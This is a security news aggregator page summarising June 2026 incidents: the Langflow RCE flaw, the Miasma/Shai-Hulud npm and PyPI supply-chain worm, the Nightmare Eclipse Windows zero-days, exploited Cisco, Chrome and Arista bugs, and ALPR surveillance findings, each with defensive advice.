SecLog

Tracking threats to information security and information freedom. Send feedback to seclog@jwest.org.
Stories 213
Sources 443
Updated 2026.06.10
My filters
Add industries, companies, or keywords you care about (e.g. healthcare, Microsoft, ransomware). "My Feed" shows only stories mentioning at least one of them. Saved as a cookie in this browser.
Attackers exploit unpatched Langflow flaw CVE-2026-5027 to run code on exposed AI workflow servers
36MIN ago 2 sources
Zero-Days & CVEsTechnology & SoftwareLangflowCISA
Attackers are exploiting a security hole in Langflow that can let outsiders take over internet-exposed servers without logging in. The flaw, CVE-2026-5027, is an unauthenticated remote-code-execution bug affecting Langflow, an open-source tool for building AI workflows; exploitation means attackers can send crafted requests to run their own commands on vulnerable systems, and the article says no patch is available yet.
Why it matters: Organizations using Langflow should treat this as urgent because an exposed server could be fully compromised with no valid account needed. If you run Langflow, restrict internet access, apply any vendor mitigations, monitor for compromise, and patch immediately once a fix is released.
Sources
Bill Toulas 2026.06.10 95%
This article updates the same underlying event by adding that exploitation of CVE-2026-5027 is being observed now, describing the bug as a path traversal in the file upload endpoint, noting arbitrary file write as the immediate impact, and pointing users to the latest Langflow release 1.10.0 while referencing prior fixes in langflow-base 0.8.3 and Langflow 1.9.0.
info@thehackernews.com (The Hacker News) 2026.06.10 100%
This article appears to be the initial report of active exploitation of CVE-2026-5027 in Langflow, and no existing tracked story covers this specific flaw or product.
Full page
Red Hat says more than 30 npm packages were backdoored to steal developer and cloud credentials
1H ago 6 sources
Breaches & Data LeaksSupply ChainMalwareTechnology & SoftwareRed HatGitHubnpmJFrog
More than 30 npm packages in Red Hat's @redhat-cloud-services namespace were compromised and used to deliver credential-stealing malware to developers who installed them. Researchers say attackers likely took over a Red Hat employee GitHub account, added malicious GitHub Actions workflows, and abused npm trusted publishing to release 96 backdoored package versions. The malware, a new Shai-Hulud variant dubbed Miasma, targeted GitHub Actions secrets, cloud credentials, SSH keys, package publishing tokens, Vault tokens, Kubernetes service-account tokens, Docker credentials, GPG keys, and .env files.
Why it matters: Developers and organizations that installed the affected packages may have had sensitive keys and tokens stolen, which can lead to wider compromise of code, cloud systems, and build pipelines. This is urgent: identify affected installs, remove the packages, and rotate all credentials and secrets that were present on impacted machines or CI/CD systems.
Sources
Bill Toulas 2026.06.10 67%
The article says Miasma was previously linked to the Red Hat npm package compromise and provides new technical context on the malware family behind that event, including credential theft from build environments, cloud services, and CI/CD pipelines and its self-propagating package poisoning behavior.
Ionut Arghire 2026.06.09 86%
The piece explicitly identifies the Red Hat npm package incident as the first June 1 Miasma wave, adding that it was part of a broader coordinated Shai-Hulud outbreak affecting dozens more npm and PyPI packages.
2026.06.02 98%
This article is a direct update on the same Red Hat package compromise, adding that 32 affected packages were being downloaded about 117,000 times per week, that Red Hat traced distribution to a compromised GitHub account, removed the packages, and linked the malware to a Mini Shai-Hulud variant dubbed Miasma.
Ionut Arghire 2026.06.02 98%
This article covers the same Red Hat npm supply-chain attack and adds specifics on the timing and scale of publication (96 malicious versions across 32 packages in 72 seconds), suspected access path (CI/CD or npm scope credentials), links to the Mini Shai-Hulud-style worm, and evidence that at least 210 repositories may contain stolen credentials.
2026.06.01 98%
This directly updates the same Red Hat npm supply-chain compromise, adding that at least 32 package releases in the @redhat-cloud-services namespace were infected with a Mini Shai-Hulud variant, tied by Wiz to a compromised Red Hat employee GitHub account, with package download volume around 80,000 per week and expanded Azure/GCP credential theft behavior.
Lawrence Abrams 2026.06.01 100%
This article establishes a distinct supply-chain incident centered on compromised Red Hat npm packages and a Miasma/Shai-Hulud credential-stealing payload, not the same underlying event as the existing @antv Mini Shai-Hulud story or other tracked package compromises.
Full page
Suspected Miasma worm compromises more than 70 Microsoft GitHub repositories and breaks Azure CI/CD workflows
1H ago 5 sources
MalwareSupply ChainTechnology & SoftwareMicrosoftGitHubJFrog
GitHub disabled more than 70 Microsoft repositories after attackers allegedly used a compromised contributor account to push malicious commits into projects including Azure/durabletask and Azure/functions-action. StepSecurity says the Miasma worm planted configuration files that could trigger remote code execution when a developer opened the repository in an integrated development environment or AI coding tool such as Claude Code, Gemini CLI, or Cursor, and the takedowns disrupted workflows that depended on Azure/functions-action@v1.
Why it matters: This affects developers and organizations that rely on Microsoft's open-source Azure tooling, with both supply-chain risk and immediate build-pipeline disruption. Teams using the affected repositories should review recent commits, rotate contributor and automation tokens, check developer machines for malicious config execution, and verify dependencies before restoring pipelines.
Sources
Bill Toulas 2026.06.10 82%
This article adds specific technical detail about the same Miasma campaign family linked to the Microsoft repository compromises, including that the source code was deliberately leaked via compromised GitHub accounts, how it steals cloud and CI/CD secrets, abuses GitHub as its control channel, targets npm, PyPI, RubyGems and JFrog Artifactory, and includes a destructive dead-man switch that wipes files if a stolen GitHub token is revoked.
2026.06.09 95%
This is a direct update on the same Miasma campaign, adding that the worm's full attack toolkit was open sourced via GitHub using previously compromised accounts, with new technical detail on its capabilities across GitHub, package registries, Artifactory, GitHub Actions, AI tool config poisoning, SSH lateral movement, and GitHub-based command-and-control.
Bill Toulas 2026.06.09 99%
This article is a direct update on the same June 5 Microsoft GitHub repository compromise, adding that GitHub disabled 73 repositories for 105 seconds, Microsoft has restored them, notified a small number of potentially affected customers, and BleepingComputer ties the incident more concretely to the Miasma/Shai-Hulud supply-chain campaign and the earlier durabletask compromise.
Ionut Arghire 2026.06.09 68%
The article ties the Miasma variant to the broader Shai-Hulud family and notes it emerged after the worm source code was released, helping connect the malware lineage behind related GitHub and CI/CD compromise activity.
2026.06.08 100%
The article establishes a distinct Microsoft-focused compromise event: a suspected Miasma worm infection of 73 GitHub repositories that triggered GitHub takedowns and caused downstream Azure CI/CD failures, even if it is related to the broader Mini Shai-Hulud lineage.
Full page
Shai-Hulud supply-chain attack trojanizes 19 PyPI bioinformatics packages to steal developer and cloud secrets
1H ago 3 sources
MalwareSupply ChainTechnology & SoftwareHealthcareEducationPyPIGitHubnpmAmazon Web ServicesGoogle CloudMicrosoft
Attackers compromised 19 Python packages on PyPI, including popular science and bioinformatics tools, and planted malware that can steal secrets from developer machines and continuous integration systems. Socket linked the activity to the broader Shai-Hulud campaign and said 37 malicious releases used executable .pth startup hooks to trigger code when Python starts, then fetched the Bun JavaScript runtime to run an obfuscated payload that targeted GitHub, npm, PyPI, AWS, GCP, Azure, Kubernetes, SSH, Docker, Vault, and Claude/MCP credentials.
Why it matters: Developers, researchers, and organizations using these packages may have had passwords, tokens, and cloud keys stolen without obvious signs. Anyone who installed affected versions should treat the environment as compromised, rotate secrets, and rebuild from known-good backups.
Sources
Bill Toulas 2026.06.10 55%
The source describes Miasma as an evolution of the earlier Shai-Hulud worm and notes that the earlier leak helped drive more advanced variants, making this a meaningful follow-on development in the same malware lineage affecting package ecosystems.
Ionut Arghire 2026.06.09 97%
This article is a direct expansion of the same Shai-Hulud malware campaign, adding that new Miasma and Hades variants spread across both npm and PyPI from June 1, hit over 100 packages and 471 malicious artifacts, and used updated loader and evasion techniques while continuing credential theft and self-propagation.
Bill Toulas 2026.06.08 100%
This article establishes a distinct new Shai-Hulud campaign on PyPI, separate from the previously tracked npm-focused Shai-Hulud incident.
Full page
CISA says new directive will change how federal agencies prioritize and patch cyber vulnerabilities
2H ago 2 sources
Policy & RegulationUrgent PatchesGovernmentCISA
CISA says it is about to change how U.S. federal agencies handle software flaws, telling them to focus first on the vulnerabilities and systems that pose the highest real-world risk. Acting Director Nick Andersen said a binding operational directive due Wednesday will shift agencies away from treating every patch the same and toward prioritizing internet-exposed assets, Known Exploited Vulnerabilities, exploit automation, and critical functions; CISA also plans closer risk reviews with critical infrastructure operators.
Why it matters: This could change patching deadlines and vulnerability-management practices across the federal government and influence how critical infrastructure owners prioritize fixes. Agencies and defenders should watch for the directive’s release because it may require faster action on the most dangerous exposed systems while de-emphasizing lower-risk issues.
Sources
2026.06.10 97%
This article is a direct update on the same CISA binding operational directive, adding the specific 72-hour requirement for vulnerabilities meeting three of four criteria, the criteria themselves, the 180-day implementation window, and the requirement to perform compromise triage before patching.
2026.06.09 100%
The article establishes a new, specific CISA policy event: an imminent binding operational directive that will alter federal vulnerability prioritization and remediation requirements.
Full page
GitHub changes npm defaults in npm 12 to stop auto-running install scripts and block risky remote dependency paths
2H ago 2 sources
Policy & RegulationSupply ChainTechnology & SoftwareGitHubnpm
GitHub says npm 12 will no longer run package install scripts by default, changing behavior that has long let malicious dependencies execute code on developer machines and continuous integration systems. The July release will disable automatic preinstall, install, and postinstall lifecycle scripts unless explicitly allowed with allow-scripts, turn --allow-git off by default, and set allow-remote to none to block remote URL dependency downloads; the move follows repeated supply-chain abuse, including Shai-Hulud-style malicious packages.
Why it matters: Developers and organizations that use npm may need to update build and install workflows before npm 12 ships, but the change should reduce one of the ecosystem's biggest package-based malware risks. Security teams should test projects now, identify legitimate packages that need script exceptions, and tighten CI defaults.
Sources
Bill Toulas 2026.06.10 98%
This article directly covers GitHub's announced npm 12 security changes, adding specifics on which install hooks and dependency sources will require explicit approval and noting npm 11.16.0 warnings to help developers prepare.
2026.06.10 100%
This article establishes a distinct ecosystem-level security hardening event: npm/GitHub is changing default package-manager behavior in response to supply-chain abuse, rather than detailing a single compromise or malware campaign.
Full page
Microsoft says three publicly dumped Windows zero-days are already being exploited after Nightmare Eclipse disclosures
3H ago 10 sources
Policy & RegulationUrgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicMicrosoft
A researcher’s public release of six Windows zero-days has already led attackers to exploit three of them, and Microsoft says more unpatched flaws remain. Microsoft named the bugs as RedSun, UnDefend, BlueHammer, YellowKey, GreenPlasma, and MiniPlasma; it said BlueHammer, RedSun, and UnDefend saw attacks after proof-of-concept exploit code was posted, while YellowKey is tracked as CVE-2026-45585 and, along with GreenPlasma and MiniPlasma, still lacks a fix.
Why it matters: Windows defenders may have little time between public disclosure and real-world attacks, especially when proof-of-concept exploit code is available. Organizations should review Microsoft mitigations immediately, monitor for compromise tied to these bug names and CVE-2026-45585, and prioritize hardening or temporary workarounds where patches do not yet exist.
Sources
2026.06.10 66%
The article also materially updates the broader Nightmare Eclipse disclosure saga by identifying RoguePlanet as the seventh public Microsoft zero-day from the same researcher and connecting it to the earlier pattern in which previously dumped flaws were later exploited before patching.
Sergiu Gatlan 2026.06.10 73%
The article is tied to the same Nightmare Eclipse disclosure wave and adds that Microsoft patched GreenPlasma and MiniPlasma, two of the publicly dumped Windows zero-days, during June 2026 Patch Tuesday.
Lawrence Abrams 2026.06.09 72%
This article adds another public zero-day release by the same researcher, Nightmare Eclipse, extending the ongoing disclosure dispute with Microsoft and showing a newly published Microsoft Defender local privilege-escalation exploit that appears to work on fully patched Windows 10 and 11 systems.
BrianKrebs 2026.06.09 87%
The piece ties two June Patch Tuesday zero-days to the same Nightmare Eclipse disclosure campaign, specifically connecting GreenPlasma to CVE-2026-45586 and YellowKey to CVE-2026-50507, while noting the researcher plans more releases.
Eduard Kovacs 2026.06.03 93%
This article covers the same underlying event: the Nightmare Eclipse/Chaotic Eclipse public disclosure of multiple unpatched Microsoft vulnerabilities, including RedSun, UnDefend, BlueHammer, and YellowKey. It adds new reporting on Microsoft's response to backlash over language seen as threatening legal action, clarifies that Microsoft says it does not intend to pursue action against good-faith researchers, and provides more detail on the researcher-vendor dispute and Microsoft's takedown of the researcher's portal and GitHub access.
2026.06.02 95%
This article covers the same underlying Nightmare-Eclipse Windows zero-day disclosure saga and adds new information that Microsoft publicly softened its rhetoric, said it does not intend to pursue legal action against researchers publishing security research, and acknowledged criticism over its earlier response after some of the dumped flaws were exploited in the wild.
Bruce Schneier 2026.06.02 95%
This article is about the same Nightmare Eclipse disclosure campaign and adds that Microsoft has threatened legal action against the anonymous researcher behind the published Windows exploits.
2026.06.01 93%
This article directly updates the Nightmare Eclipse Windows zero-day disclosure saga by adding Microsoft's walk-back: it says it does not intend to pursue legal action against researchers, acknowledges some researcher interactions fell short, and the source also notes Nightmare Eclipse plans to release another Secure Boot flaw that could bypass BitLocker and affect confidential VMs.
2026.05.29 95%
This directly updates the same Nightmare Eclipse Windows zero-day disclosure campaign with Microsoft's first formal response, confirmation that the researcher threatened another release on July 14, and added context on GitHub and Blogger pages being taken down.
2026.05.28 100%
This article establishes a broader underlying event than the existing YellowKey story: a coordinated cluster of six Windows zero-day disclosures by Nightmare Eclipse, with three already exploited and multiple flaws still unpatched.
Full page
Researcher releases RoguePlanet Windows zero-day that can give SYSTEM access on patched Windows 10 and 11
3H ago 2 sources
MalwareZero-Days & CVEsTechnology & SoftwareConsumers & General PublicMicrosoft
A security researcher published a new Windows zero-day exploit that can give an attacker full SYSTEM privileges on fully patched consumer PCs. The proof-of-concept, dubbed RoguePlanet, abuses a race condition in Microsoft Defender to achieve local privilege escalation on Windows 10 and Windows 11 systems with June 2026 updates installed; the researcher says earlier versions also enabled remote code execution through malicious .vhd(x) files on remote SMB shares and BitLocker bypass paths, but the currently released exploit is validated primarily as local escalation and reportedly does not yet work on Windows Server.
Why it matters: This matters because a public exploit can help malware or intruders turn limited access on a Windows machine into full control even after current patches are installed. Organizations should watch for Microsoft guidance, restrict untrusted SMB and disk-image handling where possible, and prioritize detection for SYSTEM-level escalation from Defender-related activity.
Sources
2026.06.10 99%
This article is directly about the same newly disclosed RoguePlanet Windows Defender zero-day, adding that The Register reports Microsoft is investigating the claim, that the bug targets Microsoft Defender on fully patched Windows 10 and 11 systems, and that Nightmare Eclipse released PoC exploit code after June Patch Tuesday.
Ionut Arghire 2026.06.10 100%
The article establishes a distinct new event: the public release and validation of a new, currently unpatched Microsoft Defender/Windows privilege-escalation exploit called RoguePlanet, separate from the previously tracked YellowKey and other Nightmare Eclipse disclosures.
Full page
ShinyHunters targets Oracle PeopleSoft servers in data-theft attacks against more than 100 organizations
3H ago 1 sources
Breaches & Data LeaksThreat Actors & APTsZero-Days & CVEsEducationGovernmentConsumers & General PublicOracleUniversity of Nottingham
Oracle PeopleSoft customers are being hit in ongoing break-ins and extortion attacks that ShinyHunters says have affected more than 100 organizations and 300 PeopleSoft instances. The campaign reportedly targets both cloud and on-premises PeopleSoft deployments, with the attackers claiming to use a chain of older bugs and at least one zero-day, though no CVE has been confirmed by Oracle. Reported evidence includes extortion notes, exposed attacker tooling, and IP-based indicators of compromise tied to infrastructure previously linked to ShinyHunters.
Why it matters: PeopleSoft is widely used for payroll, HR, finance, procurement, and student systems, so a compromise can expose highly sensitive employee, customer, or student data. Organizations running PeopleSoft should urgently review logs for the listed IPs, investigate possible unauthorized SSH access, and prepare incident response while waiting for Oracle guidance.
Sources
Lawrence Abrams 2026.06.10 100%
This article appears to be the first clear report establishing a distinct ShinyHunters campaign specifically targeting Oracle PeopleSoft environments across many organizations, with claimed victim count, tactics, and IOCs.
Full page
EFF says police used Flock Safety license plate reader data for school residency checks, background screening, and minor complaints
4H ago 2 sources
Surveillance & PrivacyPolicy & RegulationGovernmentEducationTechnology & SoftwareConsumers & General PublicFlock SafetyEFF
EFF says police agencies searched Flock Safety automated license plate reader databases for routine matters far beyond serious criminal investigations, including school residency verification, employment background checks, and noise complaints. Based on analysis of millions of audit-log searches, the report says some agencies queried plates across thousands of shared camera networks nationwide, exposing detailed location histories without a warrant requirement and showing broad mission creep in how ALPR (automated license plate reader) data is used.
Why it matters: This matters to the public because a system marketed for crime-solving is being used to track ordinary people’s movements for low-level administrative and quality-of-life issues. It raises immediate privacy and civil-liberties concerns for anyone whose vehicle data may be swept into shared ALPR networks, and it increases pressure for warrant limits, access controls, and retention safeguards.
Sources
Hudson Hongo 2026.06.10 79%
This newsletter item recaps and amplifies EFF's reporting on ALPR mission creep, specifically that license plate reader systems are being used for low-level matters such as noise complaints and other minor investigations rather than only serious crime.
Rindala Alajaji 2026.05.26 100%
This article establishes a distinct surveillance/privacy story centered on EFF's new findings about Flock Safety ALPR mission creep and the warrantless use of location data for non-criminal purposes.
Full page
China-linked JDY botnet grows and expands reconnaissance targeting of U.S. military networks
5H ago 2 sources
MalwareThreat Actors & APTsGovernmentDefense & AerospaceTechnology & SoftwareConsumers & General PublicCiscoUbiquitiDrayTekHikvisionLinksysFortinet
Researchers say the China-linked JDY botnet has grown to more than 1,500 compromised small-office/home-office and internet-connected devices and is increasingly used to probe U.S. military and related networks. Black Lotus Labs says JDY is tied to China-nexus activity previously associated with Volt Typhoon and is used for distributed scanning, banner grabbing, TLS certificate collection, and fingerprinting to find vulnerable systems soon after flaws are disclosed, including scans for FortiClient EMS bug CVE-2026-35616. The botnet uses infected routers and IoT devices from vendors including Cisco, Ubiquiti, DrayTek, Hikvision, Linksys, Araknis, and Mimosa, with command-and-control routed through Tor hidden services.
Why it matters: This matters because compromised routers and IoT gear are being used to quietly map weak points in networks tied to sensitive U.S. targets, helping follow-on intrusions. Organizations should patch exposed network devices quickly, reduce internet-facing services, and watch for scanning and unusual activity from SOHO and IoT infrastructure.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 98%
The article appears to cover the same underlying event: expansion of the China-linked JDY botnet to more than 1,500 devices and its use for reconnaissance focused on U.S. military networks.
Bill Toulas 2026.06.10 100%
This article establishes a distinct story about the JDY botnet's expansion, its China-linked reconnaissance role, and its specific focus on U.S. military-associated targets rather than a single already-tracked exploit or policy event.
Full page
Cyberattack shuts down Mackay Sugar mills in Queensland and halts cane harvest
6H ago 1 sources
Breaches & Data LeaksManufacturingMackay Sugar
A cyberattack forced Mackay Sugar, one of Australia's largest sugar producers, to shut down two mills in Queensland and stop sugarcane harvesting in the Mackay region. The company said the incident affected parts of its operations and that cybersecurity experts and authorities are investigating while systems are restored. No ransomware claim, data-theft disclosure, or technical details about the intrusion method have been confirmed yet.
Why it matters: This is a real-world operational technology and business disruption incident affecting food production and local growers, not just office IT. Organizations in agriculture and other industrial sectors should review incident response plans, segmentation between business and plant systems, and contingency procedures for outages.
Sources
2026.06.10 100%
This article establishes the incident itself: a newly disclosed cyberattack on Mackay Sugar that shut down Farleigh and Racecourse mills and interrupted harvest operations.
Full page
Cisco discloses exploited Catalyst SD-WAN Manager zero-day CVE-2026-20245 with no patch yet
7H ago 5 sources
Urgent PatchesThreat Actors & APTsZero-Days & CVEsCisco
Cisco says attackers are exploiting a new zero-day in Catalyst SD-WAN Manager, and affected organizations do not yet have a patch. The flaw, CVE-2026-20245, is a command-injection vulnerability in the command-line interface that lets an authenticated local attacker with netadmin privileges execute arbitrary commands as root by uploading a crafted file. Cisco said exploitation has been limited but observed cases where attackers pushed configuration changes to edge devices, and published indicators of compromise.
Why it matters: Organizations running Cisco Catalyst SD-WAN Manager face an actively exploited flaw that can give attackers full control of the system, with no fix available yet. Defenders should urgently check Cisco's indicators of compromise, restrict and review privileged access, hunt for abuse of related SD-WAN flaws, and prepare to patch as soon as Cisco releases updates.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 92%
This source updates the same Cisco event by saying CISA added CVE-2026-20245 to KEV amid active exploitation, which strengthens the operational urgency for organizations running Catalyst SD-WAN Manager while waiting for a vendor fix and applying available mitigations.
info@thehackernews.com (The Hacker News) 2026.06.06 99%
This article covers the same underlying event: Cisco's disclosure that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited in the wild and currently lacks an available fix.
2026.06.05 98%
This article is a direct report on the same event: Cisco's disclosure that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited in the wild with no patch available. It adds reporting detail that exploitation appears to date back at least a week, that all versions and deployment types including FedRAMP are affected, and that Cisco says attackers would need netadmin access or exploitation of CVE-2026-20182 or CVE-2026-20127.
Sergiu Gatlan 2026.06.05 99%
This article covers the same underlying event: Cisco's warning that CVE-2026-20245 in Catalyst SD-WAN Manager is being exploited as a zero-day with no patch available. It adds concrete details on the privilege-escalation path, affected deployment types, Mandiant's role in reporting, the dependency on valid netadmin access or exploitation of CVE-2026-20182/CVE-2026-20127, observed configuration changes pushed to edge devices, and example indicators of compromise in scripts.log.
Eduard Kovacs 2026.06.05 100%
This article establishes a distinct new event: Cisco's disclosure of in-the-wild exploitation of CVE-2026-20245 in Catalyst SD-WAN Manager, a separate zero-day from the other Cisco and SD-WAN stories already tracked.
Full page
Google patches exploited Chrome zero-day CVE-2026-11645 in Chrome 149
7H ago 5 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareConsumers & General PublicGoogle
Google released a Chrome 149 security update that fixes an actively exploited browser flaw, putting Chrome users at risk until they update. The zero-day, CVE-2026-11645, is a high-severity out-of-bounds read/write bug in the V8 JavaScript engine that can let a remote attacker run code inside Chrome’s sandbox via a specially crafted HTML page; exploitation likely requires chaining with a separate sandbox-escape flaw for full compromise. Google said the bug was reported in late April by an anonymous researcher.
Why it matters: Anyone using Chrome should update promptly because this flaw is already being used in real attacks. Even though the code runs inside Chrome’s sandbox, browser zero-days are high-priority because attackers often combine them with other bugs to fully compromise devices.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 90%
This article appears to advance the same Chrome event by reporting CISA has added the actively exploited Chrome flaw CVE-2026-11645 to KEV, reinforcing that exploitation is confirmed and that affected users and enterprises should prioritize updating Chrome 149 or later.
2026.06.09 97%
This article is a direct update on the same event, adding that CVE-2026-11645 is an out-of-bounds memory access bug in Chrome's V8 JavaScript engine, that Google paid a $55,000 bounty for the report, and that it is the fifth exploited Chrome zero-day fixed in 2026.
info@thehackernews.com (The Hacker News) 2026.06.09 99%
It covers the same underlying event: Google's patch for the actively exploited Chrome V8 zero-day CVE-2026-11645, reinforcing the urgency to update affected Chrome installations.
Sergiu Gatlan 2026.06.09 98%
This article reports the same underlying event: Google's emergency fix for CVE-2026-11645, an in-the-wild exploited Chrome zero-day in Chrome 149, and adds rollout version details for Windows, macOS, and Linux plus technical context that the flaw is an out-of-bounds read/write bug in the V8 engine reachable via crafted HTML.
Eduard Kovacs 2026.06.09 100%
This article establishes a new tracked event centered on CVE-2026-11645, a distinct Chrome zero-day that Google says was exploited in the wild and patched in Chrome 149.
Full page
Arista says exploited EOS flaw CVE-2026-7473 will not be patched and affected switch owners must use mitigations
7H ago 2 sources
Urgent PatchesZero-Days & CVEsTechnology & SoftwareTelecommunicationsAristaCISA
Arista says hackers have exploited a flaw in its EOS network operating system, and some affected switch platforms will not get a software fix. The issue, CVE-2026-7473, affects certain Arista devices configured as tunnel endpoints and can cause them to accept and decapsulate unconfigured tunnel traffic sent to the same IP address. Arista says impacted products include 7020R, 7280R/R2, and 7500R/R2 series, with some IPv6 decapsulation scenarios also affecting 7280R3, 7500R3, and 7800R3. CISA has added the bug to its Known Exploited Vulnerabilities list.
Why it matters: Organizations using affected Arista switches may be exposed right now, and there is no vendor patch planned, so this is a mitigation-or-replace situation rather than a routine update. Network defenders should identify affected tunnel configurations immediately, apply Arista's workarounds, and prioritize review because CISA says the flaw is being actively exploited.
Sources
info@thehackernews.com (The Hacker News) 2026.06.10 88%
This article updates that event by noting CISA has now added Arista EOS CVE-2026-7473 to the KEV catalog, confirming federal prioritization of the actively exploited flaw and increasing urgency for organizations that must rely on mitigations because some platforms will not receive a patch.
Ionut Arghire 2026.06.10 100%
This article establishes a new tracked story because it centers on a distinct exploited Arista EOS vulnerability, CVE-2026-7473, with no patch planned and fresh KEV action, which is not the same underlying event as any existing tracked story.
Full page
KrebsOnSecurity links The Gentlemen ransomware group to a suspected administrator in Izhevsk, Russia
7H ago 1 sources
RansomwareThreat Actors & APTs
A new report identifies a suspected real-world operator behind The Gentlemen, one of 2026's most active ransomware groups. KrebsOnSecurity, drawing on Check Point, Intel 471, Flashpoint, and Constella data, says the ransomware-as-a-service group has claimed at least 332 victims since mid-2025 and more than 240 in 2026, recruits affiliates with a 90/10 ransom split, and commonly gains entry through internet-facing VPN and firewall devices before rapidly encrypting networks.
Why it matters: This is a major ransomware actor by victim volume, so the attribution and tradecraft details help defenders prioritize monitoring of exposed remote-access and edge devices. Organizations should review exposure of VPNs and firewalls, harden remote access, and watch for intrusion patterns associated with fast-moving affiliate-led ransomware attacks.
Sources
BrianKrebs 2026.06.10 100%
This article establishes a distinct story centered on attribution and operational analysis of The Gentlemen ransomware group, not an update to an existing tracked event.
Full page
CISA adds actively exploited Microsoft Exchange Server XSS flaw CVE-2026-42897 to KEV catalog
8H ago 2 sources
Zero-Days & CVEsUrgent PatchesGovernmentTechnology & SoftwareCISAMicrosoft
CISA on May 15, 2026 added CVE-2026-42897, a Microsoft Exchange Server cross-site scripting vulnerability, to its Known Exploited Vulnerabilities catalog based on evidence of active exploitation. Under BOD 22-01, federal civilian agencies must remediate by CISA's due date, and CISA urged all organizations to prioritize patching KEV-listed flaws.
Why it matters: Active exploitation of an Exchange Server flaw raises immediate risk for organizations running the product, especially federal agencies subject to KEV deadlines. Defenders should identify exposed Exchange instances and prioritize remediation or mitigation quickly.
Sources
Sergiu Gatlan 2026.06.10 96%
This article is a direct update to the same CVE-2026-42897 event, adding that Microsoft has now released June 2026 security updates to patch the actively exploited Exchange Server flaw after earlier warning of exploitation and temporary mitigations.
CISA 2026.05.15 100%
This article is the first tracked item here establishing the specific KEV event for CVE-2026-42897 and its active exploitation status.
Full page
Microsoft June 2026 Patch Tuesday fixes 200 flaws, including Windows zero-days CVE-2026-45586 and CVE-2026-50507
9H ago 9 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareConsumers & General PublicMicrosoft
Microsoft released its June 2026 security updates to fix 200 vulnerabilities, including three publicly disclosed zero-days in Windows. The zero-days include CVE-2026-45586, a local privilege-escalation flaw in the Windows Collaborative Translation Framework (CTFMON) that can grant SYSTEM access, CVE-2026-49160 in HTTP.sys, and CVE-2026-50507, a BitLocker security-feature bypass requiring physical access. Microsoft says none of the three were known to be exploited at patch time.
Why it matters: Windows systems across enterprises and consumer devices may be exposed to newly public attack methods until they are patched. Organizations should prioritize June Patch Tuesday deployment and review Microsoft’s HTTP.sys mitigation guidance, while users should install Windows updates promptly.
Sources
2026.06.10 98%
This article reports on the same June 2026 Microsoft Patch Tuesday event and adds detail that it is Microsoft's largest Patch Tuesday on record, highlights the wormable Windows core flaw CVE-2026-45657, and notes that CVE-2026-41091 in Microsoft Defender was already added to CISA's KEV catalog as actively exploited.
Sergiu Gatlan 2026.06.10 69%
This is part of the same June 2026 Patch Tuesday event and adds concrete detail that the patched zero-days include YellowKey CVE-2026-45585 and MiniPlasma CVE-2020-17103 alongside GreenPlasma CVE-2026-45586.
info@thehackernews.com (The Hacker News) 2026.06.10 98%
This appears to be another report on the same June 2026 Microsoft Patch Tuesday event, describing the monthly batch of fixes, including three zero-days and critical RCE issues; it mainly adds alternate coverage and a slightly different flaw count.
2026.06.09 97%
This article is another report on the same June 2026 Patch Tuesday event, adding count details (206 CVEs, 38 critical), noting that none are yet confirmed exploited in the wild, and highlighting that CVE-2026-50507 is publicly disclosed while CVE-2026-49160 (HTTP.sys) was also patched in the same release.
BrianKrebs 2026.06.09 98%
This article is directly about the same June 2026 Patch Tuesday event and adds context on the record-breaking volume, the link to Nightmare Eclipse's GreenPlasma and YellowKey disclosures, and Microsoft's acknowledgment that June's browser fixes pushed the broader total far beyond the Patch Tuesday count.
Eduard Kovacs 2026.06.09 98%
This article is a direct report on the same June 2026 Microsoft Patch Tuesday event, adding that none of the flaws appears exploited in the wild, identifying CVE-2026-49160 as tied to the HTTP/2 Bomb denial-of-service technique, and noting nearly 40 issues are rated critical across Windows, Azure, Office, Outlook, Exchange, and AI tools.
Lawrence Abrams 2026.06.09 92%
This article is the Windows 10 ESU/LTSC delivery of the June 2026 Patch Tuesday fixes, confirming KB5094127 includes that month's 200 vulnerability fixes and adding operational details about Secure Boot certificate rollout monitoring and a known BitLocker recovery issue after recent updates.
Lawrence Abrams 2026.06.09 100%
The article establishes the broader June 2026 Microsoft Patch Tuesday event and introduces two publicly disclosed zero-days not already captured as standalone tracked stories.
Mayank Parmar 2026.06.09 93%
This article is the Windows 11 client-side rollout detail for the same June 2026 Patch Tuesday event, adding the specific KB packages (KB5094126 and KB5093998), affected Windows 11 versions (25H2/24H2 and 23H2), build numbers, and deployment guidance for installing the security fixes.
Full page
Claroty finds critical remote-attack flaws in Vertiv UPS cards and Trane Tracer SC+ HVAC controllers used in data centers
9H ago 1 sources
Zero-Days & CVEsUrgent PatchesTechnology & SoftwareVertivTrane
Researchers found critical vulnerabilities in Vertiv UPS network cards and Trane Tracer SC+ HVAC controllers that could let hackers remotely disrupt power protection and cooling systems in data centers and other facilities. Claroty reported authentication-bypass and remote-code-execution flaws in Vertiv cards, and authentication bypass, remote code execution, denial-of-service, and sensitive-information exposure issues in Trane Tracer SC+ building-management controllers; the vendors have issued patches, but the article does not list CVE IDs or affected versions.
Why it matters: These products help keep servers powered and cool, so successful attacks could cause outages, hardware damage, or forced shutdowns. Organizations using Vertiv UPS management cards or Trane Tracer SC+ should identify exposed systems and apply vendor patches and mitigations quickly.
Sources
Eduard Kovacs 2026.06.10 100%
This article appears to be the first tracked item establishing the disclosure of these specific Claroty-reported vulnerabilities in Vertiv UPS cards and Trane Tracer SC+ controllers.
Full page
Meta asks court to hold NSO Group in contempt after alleged new WhatsApp phishing targeting
10H ago 5 sources
Surveillance & PrivacySocial Engineering & PhishingPolicy & RegulationThreat Actors & APTsTechnology & SoftwareTelecommunicationsConsumers & General PublicMetaWhatsAppNSO Group
Meta says NSO Group again targeted WhatsApp users despite a court order barring it from doing so. WhatsApp said it disrupted NSO-linked social-engineering attempts involving malicious links that redirected targets to external websites, plus test accounts and groups on the platform, and published related domains and indicators of compromise. The report did not include victim counts, timing, or confirmation of successful compromises.
Why it matters: This matters because it suggests a spyware vendor accused of abusing messaging users may still be actively targeting people after a legal ban. WhatsApp users, journalists, activists, and high-risk targets should treat unsolicited links and unusual group invites with caution, and defenders should review the published indicators immediately.
Sources
Bruce Schneier 2026.06.10 96%
